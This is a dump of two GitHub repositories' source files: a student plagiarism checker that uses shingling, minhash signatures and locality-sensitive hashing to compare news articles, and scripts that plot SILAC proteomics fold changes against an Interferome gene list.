range(i+1,len_doc):\n ori_int = 0\n ori_uni = 0\n sig_int = 0\n sig_uni = 0\n\n for k in range(0,len(shingle)):\n if finalArray[k][i] == 1 and finalArray[k][j] == 1:\n ori_int = ori_int + 1\n if finalArray[k][i] == 1 or finalArray[k][j] == 1:\n ori_uni = ori_uni + 1\n\n\n for k in range(0,100):\n if sig_mat[k][i] == sig_mat[k][j]:\n sig_int = sig_int + 1\n sig_uni = 100\n jacc_sim_ori = ori_int/ori_uni\n sig_sim_sig = sig_int/sig_uni\n if sig_sim_sig > 0.5:\n list1 = []\n list1.append(i+1)\n list1.append(j+1)\n candidate_pairs.append(list1)\n print(jacc_sim_ori)\n print(sig_sim_sig)\n print()\n# printing candidate pairs\nprint(\"printint candidate pairs\")\nprint(candidate_pairs)\n\nprint(\"\\n\\n\\n\\nprinting band candidate pairs\")\nnum_rows = 20\nall_can_pairs = {}\ns1 = []\ncnt = 0\nfor k in range(0,int(100/num_rows)):\n band_can_pairs = []\n for i in range(0,len_doc):\n for j in range(i + 1, len_doc):\n sig_band_int = 0\n for l in range(cnt, cnt + num_rows):\n if sig_mat[l][i] == sig_mat[l][j]:\n sig_band_int = sig_band_int + 1\n score = sig_band_int/num_rows\n if score > 0.6:\n set2 = []\n set2.append(i+1)\n set2.append(j+1)\n print(set2,score)\n band_can_pairs.append(set2)\n if set2 not in s1:\n s1.append(set2)\n cnt = cnt + num_rows\n all_can_pairs[k] = band_can_pairs\nprint(\"print ha ha ha\")\nprint(s1)\nprint(all_can_pairs)\n\nhash_signature2(sig_mat,20,5)\nprint(\"printing using jaccard\")\nprint(cal_jacc_score_candidate_pairs(0.2))\nprint(\"printing using cosine\")\nprint(cal_cosine_score_candidate_pairs(0.2))\n\n\n\n\n" }, { "alpha_fraction": 0.5526230335235596, "alphanum_fraction": 0.5781470537185669, "avg_line_length": 30.744827270507812, "blob_id": "ef0a54498e924ae7de3abe4bac6d50b4e1d91c33", "content_id": "58880a0e152b3189ad6c5ce4d3dff70a074d8c87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9207, "license_type": "no_license", "max_line_length": 114, "num_lines": 290, "path": 
"/Locality_sensitive_hashing.py", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "import timeit\nimport pandas as pd\nimport numpy as np\nimport random\nimport math\n\nstart = timeit.default_timer()\n#files for storing the results\nf1 = open(\"ir_jacc_sim.txt\", 'w+')\nf2 = open(\"ir_sig_sim.txt\", 'w+')\nf3 = open(\"ir_sig_sim_band.txt\", 'w+')\nf4 = open(\"ir_cosine_sim.txt\", 'w+')\nf5 = open(\"ir_row_band_sim_scores.txt\", 'w+')\nf6 = open(\"ir_jacc_and_cosine_sim_using_string_hash.txt\", 'w+')\nf7 = open(\"ir_running_time.txt\", 'w+')\nf8 = open(\"ir_writing_hash_buckets.txt\", 'w+')\n#function to calculate jaccard score given two documents from the column vectors in\n#signature matrix\ndef cal_jaccard_score(sigmat,d1,d2):\n intersec = 0\n uni = 0\n for i in range(0,len(sigmat)):\n if sigmat[i][d1] == sigmat[i][d2]:\n intersec += 1\n uni = len(sigmat)\n return intersec/uni\n\n\n#function to calculate cosine score given two documents from the column vectors in\n#signature matrix\ndef cal_cosine_score(sig_mat,d1,d2):\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n for k in range(0, len(sig_mat)):\n mult = mult + sig_mat[k][d1] * sig_mat[k][d2]\n mod_doc1 = mod_doc1 + sig_mat[k][d1] * sig_mat[k][d1]\n mod_doc2 = mod_doc2 + sig_mat[k][d2] * sig_mat[k][d2]\n cosine_sim = mult / (math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n return cosine_sim\n\n\ndictionary = list() # a list to store hashed buckets\n#This function is used to create hashbuckets for every band in the \n#signature matrix\ndef hash_signature2(sig_mat, b, r):\n print(\"entering hashSig\", b, r)\n startIndex = 0\n for k in range(0, b): # iterating through each bands\n buckets = {} # a dictionary to store hashes of one band of size r rows\n for i in range(0, len_doc): # iterating through each column given by transpose of sig_mat\n toCompress = '' # string to be compressed\n for j in range(startIndex, r + startIndex):\n #print(j)\n toCompress += (str(int(sig_mat[j][i])))\n if 
toCompress not in buckets:\n buckets[str(toCompress)] = [i]\n else:\n buckets[str(toCompress)].append(i)\n startIndex += r\n # bands_done += 1\n dictionary.append(buckets)\n \n\n\n#function to calculate candidate pairs using jaccard score\ndef cal_jacc_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_jaccard_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_jaccard_score(sig_mat,hash[j],hash[k])\n #print(cal_jaccard_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\n\n\n#function to calculate candidate pairs using cosine score\ndef cal_cosine_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_cosine_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_cosine_score(sig_mat,hash[j],hash[k])\n #print(cal_cosine_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\n\n#initializing variables\ndf = pd.read_csv('news_summary.csv', sep=',', encoding='latin-1')\nd = {}\nshingle = {}\nlen_doc = 0\n\n\n\n# making shingles of length 9\nfor x in range(0, 5):\n string = df['ctext'][x]\n sh = []\n for i in range(0, len(string)-9):\n sh.append(string[i:i+9:1])\n if not string[i:i+9:1] in shingle:\n shingle[string[i:i+9:1]] = [len_doc]\n #global_shingle.append(x[i:i+9:1])\n else:\n shingle[string[i:i+9:1]].append(len_doc)\n d[len_doc] = sh\n len_doc += 1\n \n\n\n# making the list obtained as value from 9-shingle key unique\nfor key,value in shingle.items():\n list1 = set(value)\n shingle[key] = list(list1)\n\n#print(shingle)\n\n\n#building the input 
matrix\nfinalArray = np.zeros(shape=(len(shingle), len_doc))\ne = 0\nfor key, value in shingle.items():\n #print(value)\n for i in value:\n finalArray[e][i] = 1\n e = e + 1\n\n#print(finalArray)\n\n\n#building the signature matrix using hash functions\n\n#initializing signature matrix and filling with infinity values\nsig_mat = np.zeros(shape = (100,len_doc))\nfor i in range(0,100):\n for j in range(0,len_doc):\n sig_mat[i][j] = 999999\n\n\n\n#building list that will be used for multiplication with x in hash function ax + b i.e. a\nmul_list = set(random.sample(range(0, 1000), 100))\nwhile(len(mul_list)<100):\n mul_list.append(random.sample(range(0, 1000), 1)[0])\nmul_list = list(mul_list)\n\n\n\n#building list that will be used for addition in h(x) in hash function ax + b i.e. b\nadd_list = set(random.sample(range(0, 1000), 100))\nwhile(len(add_list)<100):\n add_list.append(random.sample(range(0, 1000), 1)[0])\nadd_list = list(add_list)\n\n\n\n#building 100 hash functions\nprint(\"printing signature matrix\")\nr2 = 0\nfor i in range(0, len(mul_list)):\n for k in range(0,len(shingle)):\n h = (int)(mul_list[i]*(k+1) + add_list[i])%(len(shingle))\n for l in range(0,len_doc):\n if finalArray[k][l] == 1:\n if sig_mat[r2][l] > h:\n sig_mat[r2][l] = h\n r2 = r2 + 1\nprint(sig_mat)\n\n\n#finding jaccard similarity between each pair of columns in original input matrix(finalArray) and signature matrix\nprint(\"printing similarity between rows\")\ncandidate_pairs = []\nfor i in range(0,len_doc):\n for j in range(i+1,len_doc):\n ori_int = 0\n ori_uni = 0\n sig_int = 0\n sig_uni = 0\n \n #for cosine similarity-\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n\n for k in range(0,len(shingle)):\n if finalArray[k][i] == 1 and finalArray[k][j] == 1:\n ori_int = ori_int + 1\n if finalArray[k][i] == 1 or finalArray[k][j] == 1:\n ori_uni = ori_uni + 1\n\n\n for k in range(0,100):\n if sig_mat[k][i] == sig_mat[k][j]:\n sig_int = sig_int + 1\n mult = mult + sig_mat[k][i] * sig_mat[k][j]\n 
mod_doc1 = mod_doc1 + sig_mat[k][i]*sig_mat[k][i]\n mod_doc2 = mod_doc2 + sig_mat[k][j]*sig_mat[k][j]\n cosine_sim = mult/(math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n sig_uni = 100\n jacc_sim_ori = ori_int/ori_uni\n sig_sim_sig = sig_int/sig_uni\n if sig_sim_sig > 0.2:\n list1 = []\n list1.append(i)\n list1.append(j)\n candidate_pairs.append(list1)\n f1.write(\"Jaccard Similarity between doc %d & %d : %f\\n\" %(i, j, jacc_sim_ori))\n f2.write(\"Signature Similarity between doc %d & %d : %f\\n\" %(i, j, sig_sim_sig))\n f4.write(\"Cosine Similarity between doc %d & %d : %f\\n\" %(i, j, cosine_sim))\n\n#printing candidate pairs\nprint(\"printing candidate pairs\")\nprint(candidate_pairs)\n\nprint(\"\\n\\nprinting band candidate pairs\")\nnum_rows = 20\nall_can_pairs = {}\ns1 = []\ncnt = 0\nfor k in range(0,int(100/num_rows)):\n band_can_pairs = []\n for i in range(0,len_doc):\n for j in range(i + 1, len_doc):\n sig_band_int = 0\n for l in range(cnt, cnt + num_rows):\n if sig_mat[l][i] == sig_mat[l][j]:\n sig_band_int = sig_band_int + 1\n score = sig_band_int/num_rows\n f5.write(\"%d and %d row similarity for band %d: %f\" %(i, j, k, score))\n f5.write(\"\\n\")\n if score > 0.2:\n set2 = []\n set2.append(i)\n set2.append(j)\n print(set2,score)\n band_can_pairs.append(set2)\n if set2 not in s1:\n s1.append(set2)\n cnt = cnt + num_rows\n all_can_pairs[k] = band_can_pairs\ns1.sort()\nprint(s1)\nprint(all_can_pairs)\n\nfor key, value in all_can_pairs.items():\n f3.write(\"Candidate pairs for band %d are: \" %(key+1))\n f3.write(str(value))\n f3.write(\"\\n\") \nf3.write(\"\\n\\n\\n All combined candidate pairs: \")\nf3.write(str(s1))\n\n#combining all functions to obtain the final candidate pairs\nhash_signature2(sig_mat,20,5)\nprint(\"printing using jaccard\")\ncalculated_jacc_score = cal_jacc_score_candidate_pairs(0.2)\ncalculated_cosine_score = cal_cosine_score_candidate_pairs(0.2)\nprint(calculated_jacc_score)\nf6.write(str(calculated_jacc_score))\nprint(\"printing 
using cosine\")\nprint(calculated_cosine_score)\nstop = timeit.default_timer()\nq1 = 0\nfor i in dictionary:\n f8.write(str(i))\n f8.write(\"\\n\")\nprint(\"Running time:\",stop - start)\nf7.write(str(stop-start))\nf6.write(\"\\n\\n\\n\\n\")\nf6.write(str(calculated_cosine_score))\nf1.close()\nf2.close()\nf3.close()\nf4.close()\nf5.close()\nf6.close()\nf7.close()\nf8.close()\n\n" }, { "alpha_fraction": 0.6991869807243347, "alphanum_fraction": 0.6991869807243347, "avg_line_length": 14.375, "blob_id": "1c32c9398cdc8f8702814becbcf8fa86406f5560", "content_id": "f6026dee15ca51f9771a2acefeb7f9d356d2d695", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 54, "num_lines": 8, "path": "/README.md", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "# Plaigarism-Checker\nDuplication Detection using Locality Sensitive Hashing\n\n### Team \n* Ayush Laddha\n* Dhruv Gupta\n* Saarthak Jain\n* Smit Shah\n" }, { "alpha_fraction": 0.5670995712280273, "alphanum_fraction": 0.6320346593856812, "avg_line_length": 16.769229888916016, "blob_id": "a3bf2c510e9ebc8c1c36947adbbbbe056851a9eb", "content_id": "6791105508a9910422d49541aa86807a3e5aaf14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 78, "num_lines": 13, "path": "/LSH_Shingling.py", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 13 12:05:59 2019\n\n@author: Ayush RKL\n\"\"\"\n\ntext = \"hello how are you, its jjust a test file to know how to do shingling.\"\n\ndocs = text.split(\" \")\nprint(docs)\nprint(docs[0])\nprint(docs[1])\n" }, { "alpha_fraction": 0.5311717987060547, "alphanum_fraction": 0.5594603419303894, "avg_line_length": 30.47945213317871, "blob_id": 
"4ae518e30ff4370e63ceaaec328671ed70f10059", "content_id": "6154e4225c27e24139432710f4f4da366b4efdfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9191, "license_type": "no_license", "max_line_length": 111, "num_lines": 292, "path": "/LSH.py", "repo_name": "Ayush0406/Plaigarism-Checker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 17 19:50:54 2019\n\n@author: Ayush RKL\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport random\nimport math\n\nf1 = open(\"ir_jacc_sim.txt\", 'w+')\nf2 = open(\"ir_sig_sim.txt\", 'w+')\nf3 = open(\"ir_sig_sim_band.txt\", 'w+')\nf4 = open(\"ir_cosine_sim.txt\", 'w+')\nf5 = open(\"ir_row_band_sim_scores.txt\", 'w+')\nf6 = open(\"jacc_and_cosine_sim_using_string_hash.txt\", 'w+')\n\n\ndef cal_jaccard_score(sigmat,d1,d2):\n intersec = 0\n uni = 0\n for i in range(0,len(sigmat)):\n if sigmat[i][d1] == sigmat[i][d2]:\n intersec += 1\n uni = len(sigmat)\n return intersec/uni\n\ndef cal_cosine_score(sig_mat,d1,d2):\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n for k in range(0, len(sig_mat)):\n mult = mult + sig_mat[k][d1] * sig_mat[k][d2]\n mod_doc1 = mod_doc1 + sig_mat[k][d1] * sig_mat[k][d1]\n mod_doc2 = mod_doc2 + sig_mat[k][d2] * sig_mat[k][d2]\n cosine_sim = mult / (math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n return cosine_sim\n\ndictionary = list() # a list to store hashed buckets\ndef hash_signature2(sig_mat, b, r):\n print(\"entering hashSig\", b, r)\n startIndex = 0\n for k in range(0, b): # iterating through each bands\n buckets = {} # a dictionary to store hashes of one band of size r rows\n for i in range(0, len_doc): # iterating through each column given by transpose of sig_mat\n toCompress = '' # string to be compressed\n for j in range(startIndex, r + startIndex):\n #print(j)\n toCompress += (str(int(sig_mat[j][i])))\n if toCompress not in buckets:\n buckets[str(toCompress)] = [i]\n else:\n 
buckets[str(toCompress)].append(i)\n startIndex += r\n # bands_done += 1\n dictionary.append(buckets)\n print(\"printing list of hashtables\")\n# e = 0;\n# for i in dictionary:\n# print(\"bucket\",e)\n# for key, hash in i.items():\n# print(key,hash)\n# e += 1\n \ndef cal_jacc_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_jaccard_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_jaccard_score(sig_mat,hash[j],hash[k])\n #print(cal_jaccard_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\ndef cal_cosine_score_candidate_pairs(threshold):\n final_can_pairs = {}\n for i in dictionary:\n for key,hash in i.items():\n if len(hash) > 1:\n #print(\"yes\",hash)\n for j in range(0,len(hash)):\n for k in range(j+1,len(hash)):\n if cal_cosine_score(sig_mat,hash[j],hash[k]) > threshold:\n if (hash[j],hash[k]) not in final_can_pairs :\n final_can_pairs[(hash[j],hash[k])] = cal_cosine_score(sig_mat,hash[j],hash[k])\n #print(cal_cosine_score(sig_mat,hash[j],hash[k]))\n return final_can_pairs\n\n\ndf = pd.read_csv('news_summary.csv', sep=',', encoding='latin-1')\nd = {}\nshingle = {}\nlen_doc = 0\n\nfor x in range(0, 5):\n string = df['ctext'][x]\n sh = []\n for i in range(0, len(string)-9):\n sh.append(string[i:i+9:1])\n if not string[i:i+9:1] in shingle:\n shingle[string[i:i+9:1]] = [len_doc]\n #global_shingle.append(x[i:i+9:1])\n else:\n shingle[string[i:i+9:1]].append(len_doc)\n d[len_doc] = sh\n len_doc += 1\n#print(d[5])\nprint(len_doc)\n\nfor key,value in shingle.items():\n list1 = set(value)\n shingle[key] = list(list1)\n\n#printing modified shingle dictionary\n#print(\"printing modified shingle dictionary\")\n#for key,value in shingle.items():\n# print(key)\n# print(value)\n\n\n#doing random tests for 
correctness(to be deleted later)\n#print(d[1])\nprint(len(shingle))\n#print(finalArray)\nshin_hash = {}\nh = 0\nfor i in shingle:\n shin_hash[h] = i\n h = h + 1\n\n\n#building the input matrix\nfinalArray = np.zeros(shape=(len(shingle), len_doc))\ne = 0\nfor key, value in shingle.items():\n #print(value)\n for i in value:\n finalArray[e][i] = 1\n# if i== 2:\n# print(\"yes\")\n e = e + 1\n#for i in range(0, len(shingle)):\n# if finalArray[i][5]==1:\n# print(\"tatti\")\n\n#print(finalArray)\n\n#building the signature matrix using hash functions\n\n\n#print(\"printing mul and add lists\")\n#initializing signature matrix and filling with infinity values\nsig_mat = np.zeros(shape = (100,len_doc))\nfor i in range(0,100):\n for j in range(0,len_doc):\n sig_mat[i][j] = 999999\n\n#building list that will be used for multiplication with x in hash function ax + b i.e. a\nmul_list = set(random.sample(range(0, 1000), 100))\nwhile(len(mul_list)<100):\n mul_list.append(random.sample(range(0, 1000), 1)[0])\nmul_list = list(mul_list)\n#print(mul_list)\n\n#building list that will be used for addition in h(x) in hash function ax + b i.e. 
b\nadd_list = set(random.sample(range(0, 1000), 100))\nwhile(len(add_list)<100):\n add_list.append(random.sample(range(0, 1000), 1)[0])\nadd_list = list(add_list)\n#print(add_list)\n\n#building 100 hash functions\nprint(\"printing signature matrix\")\nr2 = 0\nfor i in range(0, len(mul_list)):\n for k in range(0,len(shingle)):\n h = (int)(mul_list[i]*(k+1) + add_list[i])%(len(shingle))\n for l in range(0,len_doc):\n if finalArray[k][l] == 1:\n if sig_mat[r2][l] > h:\n sig_mat[r2][l] = h\n r2 = r2 + 1\n#print(sig_mat)\n\n#finding jaccard similarity between each pair of columns in original input matrix(finalArray)\nprint(\"printing similarity between rows\")\ncandidate_pairs = []\nfor i in range(0,len_doc):\n for j in range(i+1,len_doc):\n ori_int = 0\n ori_uni = 0\n sig_int = 0\n sig_uni = 0\n \n #for cosine similarity-\n mult = 0;\n mod_doc1 = 0;\n mod_doc2 = 0;\n\n for k in range(0,len(shingle)):\n if finalArray[k][i] == 1 and finalArray[k][j] == 1:\n ori_int = ori_int + 1\n if finalArray[k][i] == 1 or finalArray[k][j] == 1:\n ori_uni = ori_uni + 1\n\n\n for k in range(0,100):\n if sig_mat[k][i] == sig_mat[k][j]:\n sig_int = sig_int + 1\n mult = mult + sig_mat[k][i] * sig_mat[k][j]\n mod_doc1 = mod_doc1 + sig_mat[k][i]*sig_mat[k][i]\n mod_doc2 = mod_doc2 + sig_mat[k][j]*sig_mat[k][j]\n cosine_sim = mult/(math.sqrt(mod_doc1) * math.sqrt(mod_doc2))\n sig_uni = 100\n jacc_sim_ori = ori_int/ori_uni\n sig_sim_sig = sig_int/sig_uni\n if sig_sim_sig > 0.5:\n list1 = []\n list1.append(i+1)\n list1.append(j+1)\n candidate_pairs.append(list1)\n f1.write(\"Jaccard Similarity between doc %d & %d : %f\\n\" %(i+1, j+1, jacc_sim_ori))\n f2.write(\"Signature Similarity between doc %d & %d : %f\\n\" %(i+1, j+1, sig_sim_sig))\n f4.write(\"Cosine Similarity between doc %d & %d : %f\\n\" %(i+1, j+1, cosine_sim))\n #print(jacc_sim_ori)\n #print(sig_sim_sig)\n #print()\n#printing candidate pairs\nprint(\"printing candidate pairs\")\nprint(candidate_pairs)\n\nprint(\"\\n\\n\\n\\nprinting 
band candidate pairs\")\nnum_rows = 20\nall_can_pairs = {}\ns1 = []\ncnt = 0\nfor k in range(0,int(100/num_rows)):\n band_can_pairs = []\n for i in range(0,len_doc):\n for j in range(i + 1, len_doc):\n sig_band_int = 0\n for l in range(cnt, cnt + num_rows):\n if sig_mat[l][i] == sig_mat[l][j]:\n sig_band_int = sig_band_int + 1\n score = sig_band_int/num_rows\n f5.write(\"%d and %d row similarity for band %d: %f\" %(i, j, k, score))\n f5.write(\"\\n\")\n if score > 0.2:\n set2 = []\n set2.append(i+1)\n set2.append(j+1)\n print(set2,score)\n band_can_pairs.append(set2)\n if set2 not in s1:\n s1.append(set2)\n cnt = cnt + num_rows\n all_can_pairs[k] = band_can_pairs\ns1.sort()\nprint(s1)\nprint(all_can_pairs)\n#print(finalArray[0:10])\n\nfor key, value in all_can_pairs.items():\n f3.write(\"Candidate pairs for band %d are: \" %(key+1))\n f3.write(str(value))\n f3.write(\"\\n\")\n \nf3.write(\"\\n\\n\\n All combined candidate pairs: \")\nf3.write(str(s1))\n\nhash_signature2(sig_mat,20,5)\nprint(\"printing using jaccard\")\ncalculated_jacc_score = cal_jacc_score_candidate_pairs(0.2)\ncalculated_cosine_score = cal_cosine_score_candidate_pairs(0.2)\nprint(calculated_jacc_score)\nf6.write(str(calculated_jacc_score))\nprint(\"printing using cosine\")\nprint(calculated_cosine_score)\nf6.write(\"\\n\\n\\n\\n\")\nf6.write(str(calculated_cosine_score))\n\nf1.close()\nf2.close()\nf3.close()\nf4.close()\nf5.close()\nf6.close()" } ]
5
tianlinhe/new
https://github.com/tianlinhe/new
d08d547bf6e344e7ded66267c7cee2c52238ec4a
1d416b2167c96f1b1f12899d9276dc9f60f8722b
da4447698b882aed702039b0ae5469d99c802636
refs/heads/master
2021-01-19T17:25:34.726685
2018-04-24T11:18:28
2018-04-24T11:18:28
82,455,872
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5840113162994385, "alphanum_fraction": 0.6151397228240967, "avg_line_length": 38.26388931274414, "blob_id": "23b20b26d15e689228d329b85bc92ad38e90cc50", "content_id": "149974f23e4314449768214fe58c4ffc2a818d6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2827, "license_type": "no_license", "max_line_length": 113, "num_lines": 72, "path": "/python/interfere_overpal.py", "repo_name": "tianlinhe/new", "src_encoding": "UTF-8", "text": "#it shows the uncorrected Log2 (L/H)\n#it matches MS-hits with Interferome database\n#input 1)sheet=masterproteins from raw file\n # 2) Interferom\nimport pandas as pd\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\ndef f(value):\n return((-1)*math.log(value,2))\n\ndef interferome_overlap(input1, input2):\n # open the rwo file, sheet masterproteins\n xlsx = pd.ExcelFile(input1)\n# get the first sheet=master proteins as an object\n masterproteins = xlsx.parse(1)\n# only the rows with defined values of Abundance Ratio: (Heavy) / (Light) are kept\n df = masterproteins[pd.notnull(masterproteins['Abundance Ratio: (Heavy) / (Light)'])]\n df=df.sort_values(['Abundance Ratio: (Heavy) / (Light)'], ascending = False)\n foldchange = np.array(df.loc[:,'Abundance Ratio: (Heavy) / (Light)'])\n f1 = np.vectorize(f, otypes=[np.float])\n x = f1(foldchange)\n df['LOG2 (L/H)']=x\n genelist = np.array(df.loc[:,'Description'])\n \n # open the rwo file, sheet masterproteins\n xlsx = pd.ExcelFile(input2)\n#df2=foldchange Up2 and Down10000 in interferome database -> up-regulation\n df2 = xlsx.parse(1)\n df2.drop(df2.index[0:18], inplace=True)\n df2.columns = df2.iloc[0]\n df2.drop(df2.index[0],inplace = True)\n#df3=foldchange Up10000 and Down2 in interferome datbase -> down-regulation \n df3 = xlsx.parse(2)\n df3.drop(df3.index[0:18], inplace=True)\n df3.columns = df3.iloc[0]\n df3.drop(df3.index[0],inplace = True)\n \n fh, (ax1, ax) = plt.subplots(1, 2, 
sharey=True,sharex=True,figsize=(15,15))\n p = np.linspace(1,0,len(x))\n ax1.scatter(p,x,facecolors='none', edgecolors='grey',label='significant hits')\n \n \n count = 0\n for index, row in df2.iterrows():\n \n for row_num in range(len(foldchange)):\n \n if row['Gene Name'] == df.loc[:,'Description'][row_num][0:-1]:\n up=ax.scatter(p[row_num],df.loc[:,'LOG2 (L/H)'][row_num],facecolors='none', edgecolors='red')\n count += 1\n break \n print (\"Up-regulated IRGs: \", count) \n \n count = 0\n for index, row in df3.iterrows():\n \n for row_num in range(len(foldchange)):\n \n if row['Gene Name'] == df.loc[:,'Description'][row_num][0:-1]:\n down=ax.scatter(p[row_num],df.loc[:,'LOG2 (L/H)'][row_num],facecolors='none', edgecolors='black')\n count += 1\n break \n print (\"Down-regulated IRGs: \", count) \n \n ax.legend((up,down),('up-regulated IRGs','down-regulated IRGs'),loc='upper right')\n ax1.legend('hits',loc='upper right')\n plt.xlabel('Fraction')\n plt.ylabel('LOG2 (L/H)') \n plt.show()\n \ninterferome_overlap(\"20180319_04_Qp1_Nyberg_beads.xlsx\",\"Interferome/Interferome_genelist.xlsx\")\n" }, { "alpha_fraction": 0.5565749406814575, "alphanum_fraction": 0.5884665846824646, "avg_line_length": 34.21538543701172, "blob_id": "9827ce327ae1987556382d25fb7db966e5a87c28", "content_id": "f54a154e8d73c342dd8c9d9656389d1451a3c958", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2289, "license_type": "no_license", "max_line_length": 138, "num_lines": 65, "path": "/python/sigmoidal.py", "repo_name": "tianlinhe/new", "src_encoding": "UTF-8", "text": "#a \"sigmoidal\" curve for log2 (l/H) in SILAC of Mar\nimport pandas as pd\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\ndef f(value):\n return((-1)*math.log(value,2))\n\ndef one_d_dot(input):\n # open the excelfile\n xlsx = pd.ExcelFile(input)\n# get the first sheet=master proteins as an object\n masterproteins = xlsx.parse(1)\n# only the rows with 
defined values of Abundance Ratio: (Heavy) / (Light) are kept\n df = masterproteins[pd.notnull(masterproteins['Abundance Ratio: (Heavy) / (Light)'])]\n df=df.sort_values(['Abundance Ratio: (Heavy) / (Light)'], ascending = False)\n foldchange = np.array(df.loc[:,'Abundance Ratio: (Heavy) / (Light)'])\n f1 = np.vectorize(f, otypes=[np.float])\n x = f1(foldchange)\n df['LOG2 (L/H)']=x\n \n#split dots in 8 color categories according to their x-value\n#value of p makes it a sigmoidal shape. \n p = np.linspace(1,0,len(x))\n k=p\n x_color = []\n k_color = []\n separator = np.array([-6,-4,-2,-0,2,4,6,8])\n \n for number in separator:\n count =0\n \n for item in x:\n if item < number:\n count +=1\n \n alist.append(count)\n x2=np.split(x,[count,len(x)])\n x_color.append(x2[0])\n x=x2[1]\n k2=np.split(k,[count,len(k)])\n k_color.append(k2[0])\n k=k2[1] \n\n#plot the dots with 8 colors \n fh, ax = plt.subplots(1,1)\n colors = ['darkblue','cornflowerblue','lightskyblue','powderblue','mistyrose','lightcoral','firebrick','maroon']\n \n for i in range(0,len(x_color)):\n ax.scatter(x_color[i],k_color[i],color=colors[i])\n \n #add annotations for proteins in dic(indicators) \n indicators = {'P50747':'Biotin ligase','Q99873':'PRMT1','P17181':'IFNAR1','P42224':'STAT1'}\n for item in indicators:\n for row_num in range(len(foldchange)):\n if item == df.loc[:,'Accession'][row_num]:\n ax.annotate(indicators[item],(df.loc[:,'LOG2 (L/H)'][row_num],p[row_num]),arrowprops=dict(facecolor='black', shrink=0.05))\n break\n \n #ax.axes.get_yaxis().set_visible(False)\n plt.ylabel('Fraction')\n plt.xlabel('LOG2 (L/H)')\n plt.show()\n \none_d_dot(\"20180319_04_Qp1_Nyberg_beads.xlsx\")\n" }, { "alpha_fraction": 0.578847348690033, "alphanum_fraction": 0.6117796301841736, "avg_line_length": 34.8863639831543, "blob_id": "a41388224121212c00f252bf075a1d0e99e845e6", "content_id": "54315f5ef8a1c3da76fc0d1495944ea71c017d4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 1579, "license_type": "no_license", "max_line_length": 138, "num_lines": 44, "path": "/python/corrected_sigmoidal.py", "repo_name": "tianlinhe/new", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\ndef f(value):\n return((-1)*math.log(value,2))\n\ndef one_d_dot(input):\n # open the excelfile\n xlsx = pd.ExcelFile(input)\n# get the first sheet=2_masterproteins as an object\n masterproteins = xlsx.parse(2)\n# only the rows with defined values of Abundance Ratio: (Heavy) / (Light) are kept\n df = masterproteins[pd.notnull(masterproteins['Abundance Ratio: (Heavy) / (Light)'])]\n df=df.sort_values(['Abundance Ratio: (Heavy) / (Light)'], ascending = False)\n foldchange = np.array(df.loc[:,'Abundance Ratio: (Heavy) / (Light)'])\n f1 = np.vectorize(f, otypes=[np.float])\n x = f1(foldchange)\n df['LOG2 (L/H)']=x\n \n\n\n#plot the dots with 8 colors \n fh, ax = plt.subplots(1,1)\n \n \n p = np.linspace(1,0,len(x))\n for i in range(0,len(x)):\n ax.scatter(p[i],x[i],facecolors='none', edgecolors='grey')\n \n #add annotations for proteins in dic(indicators) \n indicators = {'P50747':'Biotin ligase','Q99873':'PRMT1','P17181':'IFNAR1','P42224':'STAT1'}\n for item in indicators:\n for row_num in range(len(foldchange)):\n if item == df.loc[:,'Accession'][row_num]:\n ax.annotate(indicators[item],(p[row_num],df.loc[:,'LOG2 (L/H)'][row_num]),arrowprops=dict(facecolor='black', shrink=0.05))\n break\n \n #ax.axes.get_yaxis().set_visible(False)\n plt.xlabel('Fraction')\n plt.ylabel('LOG2 (L/H)')\n plt.show()\n 